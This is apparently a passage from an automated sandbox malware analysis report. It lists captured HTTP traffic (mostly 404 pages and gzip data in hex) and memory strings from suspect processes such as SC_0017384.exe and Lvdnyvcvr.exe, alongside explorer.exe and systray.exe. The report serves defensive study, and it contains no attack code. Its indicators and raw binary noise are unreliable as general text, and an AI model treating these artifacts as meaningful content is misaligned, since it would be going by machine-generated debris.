3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Mar 2023 08:11:38 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Tue, 21 Mar 2023 08:11:42 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:03 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: store_session=9fd82tovui4062jsi2krb883uj; expires=Tue, 21-Mar-2023 09:11:05 GMT; Max-Age=3600; path=/; SameSite=LaxVary: Accept-Encoding,User-AgentCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KWaFRMSY0lCpPiDwf8DPuoaa0gu1Sb1Kcm8IfI25sJnbf5w3hc1ru9gPYcFjKOGzU60ooqcsEsBwFrc261uXwRK6O8iqCp6UGCkkqv2DM%2FuJG%2BATv00MSmQZDFv9Z0Mx7Yt4facPX%2F%2BwNWqW6fAZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba46084491e3-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 41 8b d4 40 10 85 ef fe 8a ba ed 65 26 d9 a8 2b 12 e3 80 08 b2 82 88 88 ee bd 92 ae a4 8b a9 74 85 ee ce 66 a3 f8 df a5 33 2e 9b 10 f6 60 9f 52 5d c5 f7 5e d7 23 95 8d bd 9c 5e 00 00 54 96 d0 5c 3e 97 32 72 14 3a 7d c3 8e e0 ab 46 f8 a4 a3 33 55 7e b9 7d 9a 0a 71 5e d7 e9 d4 6a e6 df 9b 9b 74 7a f4 1d bb f2 fa dd ae 33 a0 31 ec ba f2 d5 f5 f0 b0 ef b6 ea 62 59 bc 1c 1e f2 22 bb 81 5b 92 7b 8a dc e0 e1 83 67 94 c3 1d 79 83 0e 0f 01 5d 38 06 f2 dc 6e 09 7f 36 95 2d fe c7 57 52 3e 06 fe 45 e5 eb b7 cf 39 3b 4e c4 9d 8d a5 53 df a3 ec 67 84 1d 1d ed 65 66 4f d9 ba 0b d1 ab eb f6 0e 0d 87 41 70 2e d9 2d b4 5a b4 39 ef 95 26 36 d1 96 6f 6e 9e d7 a8 f2 55 58 55 fe 14 77 95 12 5b 65 6a 8b 5d ec b6 58 f5 87 6d de 3f 2c c1 90 e6 67 1d 01 3d 81 a8 9e d9 75 d0 aa 87 46 47 31 e0 34 42 4d d0 26 58 06 1f 2d 35 67 88 96 00 8d f1 14 02 d4 e8 37 c8 a8 40 2e 8c 7e 61 7a f8 f9 fd 0b 70 80 30 90 08 19 68 d4 7b 6a a2 cc 19 7c 6e 01 45 80 24 10 b4 c8 12 0e 8b 8b 06 dd 86 77 cf 81 23 24 94 d5 fe 9f 5b 8c 8b 05 61 77 86 9a 44 a7 6c b5 a9 d5 13 2b 04 eb a9 7d 7f 65 63 1c ca 3c 9f a6 29 eb d1 70 50 d7 e8 e8 e2 2c ec 1a 15 97 35 da e7 57 a7 bb 45 2a 91 6f 93 54 5a 64 95 e3 e3 d2 2f 9b ae f2 e5 b7 fb 0b 00 00 ff ff 03 00 16 97 a9 87 7d 03 00 00 0d 0a Data Ascii: 1a8A@e&+tf3.`R]^#^T\>2r:}F3U~}q^jtz31bY"[{gy]8n6-WR>E9;NSgefOAp.-Z9&6onUXUw[ej]Xm?,g=uFG14BM&X-5g7@.~azp0h{j|nE$w#$[awDl+}ec<)pP,5WE*oTZd/}
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:05 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: store_session=vcue9caqutq1egitp5nphb1rt3; expires=Tue, 21-Mar-2023 09:11:07 GMT; Max-Age=3600; path=/; SameSite=LaxVary: Accept-Encoding,User-AgentCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3zhXmDCjpuF5r%2Bb9vkduN0KPsoBeKDzLZNY3uaKncUAAqPX6SkIDrpdCezdg4FjjcIBL%2FNo4lSZYEpqmzFAP2h8MVNRFhOst32YstoJPL4qiU5v6bAiqgArzH4QLWvfQu6cu8Y6vH%2BC8E3DIy%2F6M"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba562b803a8e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 64 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 31 32 70 78 2f 31 2e 35 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6e 67 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 36 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c Data Ascii: 37d<html> <head> <title>Page Not Found</title> <style> body{ margin:0; padding:30px; font:12px/1.5 Helvetica,Arial,Verdana,sans-serif; } h1{ margin:0; font-size:48px; font-weight:normal; line-height:48px; } strong{ display:inline-block; width:65px; } </styl
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e6%2FEJDgHQjcuoYohdj0ra%2F4d26S7I%2F%2Bw3pN85cRgpRzvKvZ8TVLQZ1RwEuiccVevTyJQY4GtfAPWzseKtdfiDGgIup9D4IyI%2FBZWQiByR2tNVx7SRS3S28yavWbxfCbqlw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba77cf4a2c63-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 64 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 51 29 94 08 dc 03 47 83 17 b9 52 1b 1b 7b db 88 bf 47 49 85 c4 75 e6 cd 68 86 6e 9a 97 b5 7d ef 5b 78 b2 cf 1d f4 fb c7 6e bb 86 c5 2d e2 b6 b5 1b c4 c6 36 57 e7 ae aa 11 db dd 82 0d 05 3d 1d 99 82 38 cf 86 f4 a0 47 e1 55 bd 82 5d 54 d8 c4 f3 e0 09 af a2 21 9c 21 fa 88 fe 67 ca 2d f9 1f 13 96 6c 28 b1 0d 02 59 be cf 52 54 3c ec 5f 3b 18 5d 81 21 2a 7c 4d 1c c4 01 34 1c 0a 14 c9 17 c9 15 61 9a 9a 32 1b 72 de 67 29 85 1f 92 fb 0c 02 6f 33 00 4e 61 1c c7 ea 24 ea f4 52 b9 94 a0 8f 59 e1 be 26 fc 0b 18 c2 79 11 e1 fc c4 fc 02 00 00 ff ff 0d 0a Data Ascii: d4LN0Dw)j%hRQ)GR{GIuhn}[xn-6W=8GU]T!!g-l(YRT<_;]!*|M4a2rg)o3Na$RY&y
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j35Ko95Gih9X9oQzlqUwyxDva9uf6%2FviF1QglfgNtSZEGe%2BvokmHM1OjP7qIItQ6rs7MSbtjMUgDnP6CWLGU0vvNzD4P%2BxBg2jK05xN7S4tpFsO4Dhh6v4ufnjsHIFf0bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba87de882c3e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 74 61 74 76 2e 61 70 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.metatv.app Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 21 Mar 2023 08:11:52 GMTcontent-type: text/html; charset=utf-8content-length: 9503set-cookie: AWSALB=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/set-cookie: AWSALBCORS=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/; SameSite=Noneserver: Apachevary: X-Forwarded-Proto,Accept-Encoding,User-Agentset-cookie: session=fda0h9v5c31k27ncfm8cd5p2ff; path=/; domain=.brunaeleandro.com; secure; SameSite=Nonecontent-encoding: gzipconnection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d 5b 73 db c6 96 ee b3 fc 2b da 4c 6d 53 9a 10 20 2e c4 4d 12 ed 72 14 27 e3 94 7c 39 b6 93 7d 66 ab 5c ac 26 d1 24 61 83 00 03 80 ba 24 f1 8f d9 35 0f 53 73 aa e6 e9 d4 79 39 8f c7 7f ec 7c ab 71 21 40 82 12 95 38 79 18 c5 91 80 46 f7 ea 75 5f ab 2f 68 9c 3e fc f6 d5 d9 bb 7f 7b fd 8c cd b3 45 f8 f8 c1 69 fe 87 b1 d3 b9 e0 3e 5d e0 72 21 32 8e e7 d9 52 11 3f af 82 cb 61 e7 2c 8e 32 11 65 ca bb 9b a5 e8 b0 49 7e 37 ec 64 e2 3a eb 13 80 13 36 99 f3 24 15 d9 70 95 4d 15 b7 c3 fa 12 64 18 44 1f 59 22 c2 61 27 9d c7 49 36 59 65 2c 40 e3 0e 9b 27 62 3a ec f4 fb 13 3f 52 78 8a 76 a9 12 8a 19 9f dc a8 13 9e f2 44 9d c4 8b fe 94 5f 52 65 15 bf 9e 5c 0e 0d 09 f3 34 0b b2 50 3c 7e fd f9 9f b3 20 e2 2c fa fc ef 31 13 11 e1 93 70 9f b3 df d8 59 d9 fc b4 9f 57 7d 90 13 13 f1 85 18 76 2e 03 71 b5 04 22 35 12 ae 02 3f 9b 0f 7d 81 be 84 22 6f 7a 2c 88 82 2c e0 a1 92 4e 78 28 86 ba aa 75 1e 3f 78 50 b2 25 87 34 8b e3 59 28 94 34 c8 84 72 29 92 60 1a 4c 78 16 10 69 15 e4 ef 5f 5c 67 8b 6f ff 1e 3c 7d 75 a9 bc 5d 0d 7e f1 94 f4 c7 a7 37 3f fc f0 f2 c7 ef b3 70 7e f3 d3 37 2f 56 df 70 f3 4c 9f fe 9c 4a da a8 87 74 92 04 cb 8c a5 c9 64 d8 21 fe a7 c7 fd fe 38 51 01 4f 24 cb 24 48 85 7a 15 8c 53 62 4a dc 1f f3 28 12 89 fa 21 7d 42 58 3c f7 87 8e 6b 69 9e d0 34 c5 b1 1d 5f 19 98 86 ad 78 96 e1 29 53 cd b7 0c 73 e2 ea a6 33 e9 3c 3e ed e7 9d a0 c3 07 ad fd 89 c5 58 f8 6a 06 49 4f e3 64 21 45 91 17 7d 48 1b ad 4f 1f 2a 0a fb d7 77 2f ce 2d f6 76 1e 2c 18 8f 7c f6 46 a4 cb 38 a2 aa ec f9 33 97 a5 ab 25 b1 9b c5 d3 a2 a2 08 c5 02 c4 a4 b2 f2 42 f8 01 67 3f af c0 3e 91 32 45 79 2c 41 5e 04 53 16 66 68 ce bc f7 Data Ascii: }[s+LmS .Mr'|9}f\&$a$5Ssy9|q!@8yFu_/h>{Ei>]r!2R?a,2eI~7d:6$pMdDY"a'I6Ye,@'b:?RxvD_Re\4P<~ ,1pYW}v.q"5?}"oz,,Nx(u?xP%4Y(4r)`Lxi_\go<}u]~7?p~7/VpLJtd!8QO$$HzSbJ(!}BX<ki4_x)Ss3<>XjIOd!E}HO*w/-v,|F83%Bg?>2Ey,A^Sfh
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
          Source: Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
          Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
